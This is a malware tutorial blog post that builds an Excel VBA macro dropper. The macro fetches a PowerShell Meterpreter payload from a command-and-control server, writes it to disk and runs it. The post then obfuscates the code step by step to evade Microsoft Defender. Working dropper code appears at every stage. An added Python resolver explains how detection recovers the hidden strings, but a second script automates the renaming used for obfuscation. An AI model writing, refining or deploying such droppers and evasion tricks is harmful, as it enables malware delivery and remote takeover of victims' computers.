Malware Project - Almost Bypass MsDefender
Disclaimer
Hello! This is actually my first real macro, written while trying to obfuscate it and bypass Defender (sort of)! This code will escape Defender, but the remote payload will not, since it was a Meterpreter PowerShell script; maybe in the next part 👨💻
Raw Code, no obfuscation
First of all, before trying to obfuscate VBA code, you need code that works!
Here is the piece of code I used to download my payload from a C2 server:
Private Sub CommandButton1_Click()  ' Click handler of an Excel ActiveX button
DownloadFileFromURL  ' Fetch the payload from the C2 (see below)
Dim myoutputfile As Integer  ' These two variables ended up unused
Dim FilePath As String
Shell ("powershell.exe -noexit .\payload.ps1")  ' Run the PowerShell payload (here a plain Meterpreter stager); the path is relative to Excel's current directory
End Sub
Sub DownloadFileFromURL()
Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")  ' COM objects for the HTTP request and for writing the file to disk
Set objADODBStream = CreateObject("ADODB.Stream")
objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False  ' IP or URL of the C2; the payload is served as a .txt; False = synchronous request
objXMLHTTP.Send
objADODBStream.Type = 1  ' 1 = adTypeBinary
objADODBStream.Open
objADODBStream.Write objXMLHTTP.responseBody
objADODBStream.savetofile "payload.ps1", 2  ' 2 = adSaveCreateOverWrite; the .txt is written as a .ps1 script in Excel's current directory
End Sub
This is not big or fancy code, but it works! At this point Defender will tear the file apart, so be careful: the plaintext ProgIDs, the URL and the Shell call are exactly the kind of material static signatures key on.
First Stage - Non-sense Code
In this first stage I have working code, but I want to "lure" Defender by adding random, meaningless code that does nothing at all. Here I chose to put Do While loops everywhere, like this:
Dim t
t = 1
Do While t < 2
t = t + 1
Loop
Here is an example of what it looks like:
Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop
DownloadFileFromURL
Dim myoutputfile As Integer
Dim FilePath As String
Shell ("powershell.exe -noexit .\payload.ps1")
End Sub
Sub DownloadFileFromURL()
Dim t,q,w,e,r,a,s
t = 1
Do While t < 5
t = t + 1
Loop
Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")
Set objADODBStream = CreateObject("ADODB.Stream")
objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False
objXMLHTTP.Send
objADODBStream.Type = 1
objADODBStream.Open
objADODBStream.Write objXMLHTTP.responseBody
objADODBStream.savetofile "payload.ps1", 2
End Sub
Code like this also makes life harder for the analyst reversing the macro, and it changes the byte patterns a static signature may have been written against. It does nothing against behavioural detection, since the loops have no effect at runtime.
Second Stage - Obfuscate the Objects
While thinking about how to turn the code into more garbage, I decided to hide the Microsoft objects created in the download function.
Calls like CreateObject("Microsoft.XMLHTTP") and CreateObject("ADODB.Stream") are flagged almost automatically, because those ProgIDs turn up in so many malicious macros, so I hid the names in the code using the Replace() function.
Here is a simple Example
A = "Mic00000ft"
B = Replace(A,"00000","roso")
In this example B will contain "Microsoft", since the "00000" is replaced by the missing part of the word, and B can then be passed to CreateObject().
Here is what it looks like (I used runs of 0 as filler just to keep the code block readable; you can use any random string, and a random one is better, as long as it does not also occur in the real value, because Replace() substitutes every occurrence):
q = "Mic00000000000000000000000000000ft"
w = Replace(q,"00000000000000000000000000000","roso")
e = "XM00000000000000000000000000000TP"
r = Replace(e,"00000000000000000000000000000","LHT")
a = "AD00000000000000000000000000000B"
s = Replace(a,"00000000000000000000000000000","OD")
b = "St00000000000000000000000000000am"
n = Replace(b,"00000000000000000000000000000","re")
Set objXMLHTTP = CreateObject(w & "." & r)
Set objADODBStream = CreateObject(s & "." & n)
Don’t forget to hide the URL as well:
qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
pp = "pay0000000000000000000d"
kk = Replace(pp,"0000000000000000000","loa")
objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
objXMLHTTP.Send
Of course there are many other ways to hide data like this; I'm using the simplest one possible for now. Bear in mind what it does and does not buy you: the strings are only hidden from a scan of the module text. They are reassembled in memory right before CreateObject runs, and the Office AMSI integration hands the VBA runtime's behaviour log, including CreateObject calls with their resolved arguments, to the installed antivirus.
Hide that Shell!
One of the most heavily flagged functions is the VBA Shell command! But there are other ways to start a process without calling it directly, for example the Run method of the WScript.Shell object:
Set Shell = CreateObject("WScript.Shell")
Shell.Run("whoami")
As with the previous objects, we use the same method to hide the WScript.Shell ProgID.
x = "WS0000000000000000000000000pt"
c = Replace(x,"0000000000000000000000000","cri")
v = "Sh0000000000000000000000000l"
f = Replace(v,"0000000000000000000000000","el")
Set Shell = CreateObject(c & "." & f)
Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\pa" & "yloa" & "d.ps1")
I also split the PowerShell command into pieces so it is not written out directly in the script.
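It is worth checking how much these two tricks actually hide from someone who reads the macro rather than the file bytes. The script below is an added example written for this page, not code from the post: a small static resolver in Python that evaluates the string-only statements of the module (literals, &, Replace()) and prints the arguments that reach CreateObject, .Open and .run. Its input is the post's macro with the readable names, trimmed to the lines that carry the obfuscated strings; the zero-run fillers are built with a Python expression so their lengths match for certain. The resolver only understands that subset of VBA and leaves any name it cannot resolve marked in the output.

```python
import re

Z29, Z25, Z19 = "0" * 29, "0" * 25, "0" * 19  # filler runs, as in the post; any junk string works
# Sample input: the post's macro with readable names, trimmed to the lines that carry strings.
MACRO = rf'''
Private Sub CommandButton1_Click()
x = "WS{Z25}pt"
c = Replace(x,"{Z25}","cri")
v = "Sh{Z25}l"
f = Replace(v,"{Z25}","el")
Set Shell = CreateObject(c & "." & f)
Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\pa" & "yloa" & "d.ps1")
End Sub
Sub DownloadFileFromURL()
q = "Mic{Z29}ft"
w = Replace(q,"{Z29}","roso")
e = "XM{Z29}TP"
r = Replace(e,"{Z29}","LHT")
a = "AD{Z29}B"
s = Replace(a,"{Z29}","OD")
b = "St{Z29}am"
n = Replace(b,"{Z29}","re")
Set objXMLHTTP = CreateObject(w & "." & r)
Set objADODBStream = CreateObject(s & "." & n)
qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
pp = "pay{Z19}d"
kk = Replace(pp,"{Z19}","loa")
objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
End Sub
'''

# Tokens of the string sub-language: "literal" ("" escapes a quote), name, &, and ( ) ,
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)|(&)|([(),])')
STRINGS = re.compile(r'"(?:[^"]|"")*"')
ASSIGN = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", re.I)
# Sinks whose arguments we want: CreateObject(...), <obj>.Open ..., <obj>.Run (...)
SINK = re.compile(r"\b(CreateObject)\s*\((.*)\)|\.(Open|Run)\b\s*\(?(.*?)\)?\s*$", re.I)

def tokenize(expr):
    """Returns [(kind, text)] with kind in str/id/amp/punct; numbers and operators like + are dropped."""
    toks = []
    for m in TOKEN.finditer(expr):
        kind, text = ("str", "id", "amp", "punct")[m.lastindex - 1], m.group(m.lastindex)
        toks.append((kind, text.replace('""', '"') if kind == "str" else text))
    return toks

class StringResolver:
    """Recursive-descent evaluator:  expr := term ('&' term)*
                                     term := "literal" | name | Replace(expr, expr, expr)"""
    def __init__(self):
        self.vars = {}
    def expr(self, toks, i):
        val, i = self.term(toks, i)
        while i < len(toks) and toks[i] == ("amp", "&"):
            rhs, i = self.term(toks, i + 1)
            val += rhs
        return val, i
    def term(self, toks, i):
        kind, text = toks[i]
        if kind == "str":
            return text, i + 1
        if kind == "id" and text.lower() == "replace":
            args, i = self.arg_list(toks, i + 1)
            return args[0].replace(args[1], args[2]), i
        if kind == "id":
            return self.vars.get(text, "<%s?>" % text), i + 1  # unresolved names stay visible
        raise ValueError("unexpected token %r" % text)
    def arg_list(self, toks, i):
        """Parses 'expr, expr, ...', with or without the surrounding parentheses."""
        wrapped = i < len(toks) and toks[i] == ("punct", "(")
        if wrapped:
            i += 1
        args = []
        while i < len(toks) and toks[i] != ("punct", ")"):
            val, i = self.expr(toks, i)
            args.append(val)
            if i < len(toks) and toks[i] == ("punct", ","):
                i += 1
        return args, (i + 1 if wrapped else i)

def resolve(macro):
    """Walks the module once; returns ([(sink, resolved argument)], variable table)."""
    rs, sinks = StringResolver(), []
    for line in macro.splitlines():
        m = SINK.search(line)
        if m:
            name = m.group(1) or m.group(3)
            args, _ = rs.arg_list(tokenize(m.group(2) if m.group(1) else m.group(4)), 0)
            # CreateObject and Run carry the value as 1st argument, XMLHTTP.Open as 2nd (the URL)
            sinks.append((name, args[1] if name.lower() == "open" else args[0]))
            continue
        m = ASSIGN.match(line)
        # Only evaluate pure string expressions; arithmetic such as  y = y + 1  is skipped
        if m and not re.search(r"[^\w&(),\s]", STRINGS.sub("", m.group(2))):
            toks = tokenize(m.group(2))
            if toks:
                rs.vars[m.group(1)], _ = rs.expr(toks, 0)
    return sinks, rs.vars

if __name__ == "__main__":
    for sink, value in resolve(MACRO)[0]:
        print("%-13s -> %s" % (sink, value))
```

Running it prints the five resolved sinks: WScript.Shell, the powershell.exe command line, Microsoft.XMLHTTP, ADODB.Stream and the full URL with the real IP and port. That is the same picture a runtime behaviour log gives the antivirus, and tools such as olevba apply the same idea to real samples at scale, which is why this layer buys time against file scanning but not against anyone who looks.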
Last Stage - Random names
The last stage at this point is simply to use random strings as function and variable names.
For that part I'm using an online tool called Code Protection; I just have to list every name I want replaced in the code.
Here is the code before renaming:
Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop
DownloadFileFromURL
Dim myoutputfile As Integer
Dim FilePath As String
x = "WS0000000000000000000000000pt"
c = Replace(x,"0000000000000000000000000","cri")
v = "Sh0000000000000000000000000l"
f = Replace(v,"0000000000000000000000000","el")
Set Shell = CreateObject(c & "." & f)
Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\pa" & "yloa" & "d.ps1")
End Sub
Sub DownloadFileFromURL()
Dim t,q,w,e,r,a,s,b,n,qq,ww,ee,rr,pp,kk
t = 1
Do While t < 5
t = t + 1
Loop
q = "Mic00000000000000000000000000000ft"
w = Replace(q,"00000000000000000000000000000","roso")
e = "XM00000000000000000000000000000TP"
r = Replace(e,"00000000000000000000000000000","LHT")
a = "AD00000000000000000000000000000B"
s = Replace(a,"00000000000000000000000000000","OD")
b = "St00000000000000000000000000000am"
n = Replace(b,"00000000000000000000000000000","re")
Set objXMLHTTP = CreateObject(w & "." & r)
Set objADODBStream = CreateObject(s & "." & n)
qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
pp = "pay0000000000000000000d"
kk = Replace(pp,"0000000000000000000","loa")
objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
objXMLHTTP.Send
objADODBStream.Type = 1
objADODBStream.Open
objADODBStream.Write objXMLHTTP.responseBody
objADODBStream.savetofile "payload.ps1", 2
End Sub
And here is the final code with "full" obfuscation:
Private Sub CommandButton1_Click()
Dim nf7d7aafa614ae2e12b395d5df9ee4929,y5e2e19a97c2f321d8ce6e7ff6497d702,y701c18a7c7d41871239961947e31b2cd,ef34bc76f2d314271e34337eab2eb2cd2,qc0cc6e49592dec80416d6a3da9f01597,beb81d1e85adc52615465c469a1c20bab,xcd4143bfd53557b1234092d59353cfe5
nf7d7aafa614ae2e12b395d5df9ee4929 = 1
Do While nf7d7aafa614ae2e12b395d5df9ee4929 < 2
nf7d7aafa614ae2e12b395d5df9ee4929 = nf7d7aafa614ae2e12b395d5df9ee4929 + 1
Loop
t0894a182edb305bfc894f9a0d77ae549
Dim b8da5de0cf00af37347314a034ce6ac76 As Integer
Dim bcf9563044e940bcb370186ece0207409 As String
y5e2e19a97c2f321d8ce6e7ff6497d702 = "WS0000000000000000000000000pt"
y701c18a7c7d41871239961947e31b2cd = Replace(y5e2e19a97c2f321d8ce6e7ff6497d702,"0000000000000000000000000","cri")
ef34bc76f2d314271e34337eab2eb2cd2 = "Sh0000000000000000000000000l"
qc0cc6e49592dec80416d6a3da9f01597 = Replace(ef34bc76f2d314271e34337eab2eb2cd2,"0000000000000000000000000","el")
Set qe46fdc45ae3a5515584f4d44a8b8b2df = CreateObject(y701c18a7c7d41871239961947e31b2cd & "." & qc0cc6e49592dec80416d6a3da9f01597)
qe46fdc45ae3a5515584f4d44a8b8b2df.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\pa" & "yloa" & "d.ps1")
End Sub
Sub t0894a182edb305bfc894f9a0d77ae549()
Dim e97b8956a358b260b24afd06d64494c4d,yffcbe4af74f35a61ac88aaa0d41c9d86,e1c09f164c1c3bf60b15c09b54cf7a8b8,e5c068c60001ee2d4009beea3ad32b6e1,nfe31c02a86912d80a6cceb7de2c789ec,c17fea5c0191a5bc3c2640b8f16b14e98,y560c5fa7e5f4ddabb1dea7096c30fbb3,ea06f6764676da2a53039a8c582369215,vd788acd2ab98604acf912471d7b2c47d,ec8a6296f4b0f1b2953f0f43b25d28c20,bed6dad1b0c47ef9d6216c7e497e4fe06,q2df3664a88d9cc00cc1292b9cfc38a51,b860812e2b3f298fda368e6ddfcab2411,x3a75ddb3e3822fdc37a0501d9420704e,r69ab3e7a1c107402489ab3fd7b058463
e97b8956a358b260b24afd06d64494c4d = 1
Do While e97b8956a358b260b24afd06d64494c4d < 5
e97b8956a358b260b24afd06d64494c4d = e97b8956a358b260b24afd06d64494c4d + 1
Loop
yffcbe4af74f35a61ac88aaa0d41c9d86 = "Mic00000000000000000000000000000ft"
e1c09f164c1c3bf60b15c09b54cf7a8b8 = Replace(yffcbe4af74f35a61ac88aaa0d41c9d86,"00000000000000000000000000000","roso")
e5c068c60001ee2d4009beea3ad32b6e1 = "XM00000000000000000000000000000TP"
nfe31c02a86912d80a6cceb7de2c789ec = Replace(e5c068c60001ee2d4009beea3ad32b6e1,"00000000000000000000000000000","LHT")
c17fea5c0191a5bc3c2640b8f16b14e98 = "AD00000000000000000000000000000B"
y560c5fa7e5f4ddabb1dea7096c30fbb3 = Replace(c17fea5c0191a5bc3c2640b8f16b14e98,"00000000000000000000000000000","OD")
ea06f6764676da2a53039a8c582369215 = "St00000000000000000000000000000am"
vd788acd2ab98604acf912471d7b2c47d = Replace(ea06f6764676da2a53039a8c582369215,"00000000000000000000000000000","re")
Set q7089b94b9f9e338b5cdc57f6a3245c47 = CreateObject(e1c09f164c1c3bf60b15c09b54cf7a8b8 & "." & nfe31c02a86912d80a6cceb7de2c789ec)
Set r6deb5e78454a0af561242cf3d291aa21 = CreateObject(y560c5fa7e5f4ddabb1dea7096c30fbb3 & "." & vd788acd2ab98604acf912471d7b2c47d)
ec8a6296f4b0f1b2953f0f43b25d28c20 = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
bed6dad1b0c47ef9d6216c7e497e4fe06 = Replace(ec8a6296f4b0f1b2953f0f43b25d28c20,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
q2df3664a88d9cc00cc1292b9cfc38a51 = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
b860812e2b3f298fda368e6ddfcab2411 = Replace(q2df3664a88d9cc00cc1292b9cfc38a51,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
x3a75ddb3e3822fdc37a0501d9420704e = "pay0000000000000000000d"
r69ab3e7a1c107402489ab3fd7b058463 = Replace(x3a75ddb3e3822fdc37a0501d9420704e,"0000000000000000000","loa")
q7089b94b9f9e338b5cdc57f6a3245c47.Open "GET", "http://" & bed6dad1b0c47ef9d6216c7e497e4fe06 & ":" & b860812e2b3f298fda368e6ddfcab2411 & "/" & r69ab3e7a1c107402489ab3fd7b058463 & ".txt", False
q7089b94b9f9e338b5cdc57f6a3245c47.Send
r6deb5e78454a0af561242cf3d291aa21.Type = 1
r6deb5e78454a0af561242cf3d291aa21.Open
r6deb5e78454a0af561242cf3d291aa21.Write q7089b94b9f9e338b5cdc57f6a3245c47.responseBody
r6deb5e78454a0af561242cf3d291aa21.savetofile "payload.ps1", 2
End Sub
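The renaming step is mechanical enough to do without an online tool. Below is an added example in Python, written for this page rather than taken from the post or from the Code Protection tool: it renames a chosen set of identifiers to a letter followed by 32 hex digits, the same shape as the names in the final code above, and shows the two things such a tool has to get right, leaving string literals and comments alone and matching identifiers case-insensitively as VBA does. The sample source is the post's raw macro, with one trailing comment kept to show it is not touched.

```python
import re
import secrets

# Sample input (the post's raw macro); the trailing comment shows what must not be renamed.
SOURCE = r'''Private Sub CommandButton1_Click()
DownloadFileFromURL ' Call the DownloadFileFromURL function
Dim myoutputfile As Integer
Shell ("powershell.exe -noexit .\payload.ps1")
End Sub
Sub DownloadFileFromURL()
Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")
objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False
End Sub'''

# A "literal" ("" is an escaped quote) or a ' comment running to end of line: copied through as-is.
PROTECTED = re.compile(r'"(?:[^"]|"")*"|\'.*$')


def random_name(hex_digits=32):
    """A legal VBA identifier: a letter, then hex digits (VBA caps identifiers at 255 chars)."""
    return secrets.choice("abcdefghijklmnopqrstuvwxyz") + secrets.token_hex(hex_digits // 2)


def rename_identifiers(source, names, mapping=None):
    """Rename every whole-word occurrence of `names` (case-insensitively, as VBA resolves them)
    outside string literals and comments.  Pass only names you defined yourself: renaming a
    built-in such as Shell or CreateObject would break the macro.  Returns (new_source, table)
    where table maps lower-cased old name -> new name, so the code can be read back later."""
    mapping = {old.lower(): new for old, new in (mapping or {}).items()}
    if not names:
        return source, mapping
    for name in names:
        mapping.setdefault(name.lower(), random_name())
    ident = re.compile(r"\b(%s)\b" % "|".join(re.escape(n) for n in names), re.I)
    swap = lambda m: mapping[m.group(1).lower()]
    out = []
    for line in source.splitlines():
        pos, pieces = 0, []
        for seg in PROTECTED.finditer(line):
            pieces.append(ident.sub(swap, line[pos:seg.start()]))  # code: rename
            pieces.append(seg.group(0))                            # literal or comment: keep
            pos = seg.end()
        pieces.append(ident.sub(swap, line[pos:]))
        out.append("".join(pieces))
    return "\n".join(out), mapping


if __name__ == "__main__":
    renamed, table = rename_identifiers(SOURCE, ["DownloadFileFromURL", "objXMLHTTP", "myoutputfile"])
    print(renamed)
```

Run it to print the renamed module; the table it returns is what you keep if you ever want to read your own obfuscated code again. Note that the Sub definition and its call site are renamed consistently while the word inside the comment and the strings passed to Shell and CreateObject stay untouched, which is also why this stage alone changes nothing for a scanner that looks at the strings.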
Hope you enjoyed this little post. I'll try to write a next part with the "evasion" of the last stage, the execution of the reverse shell!
Thanks!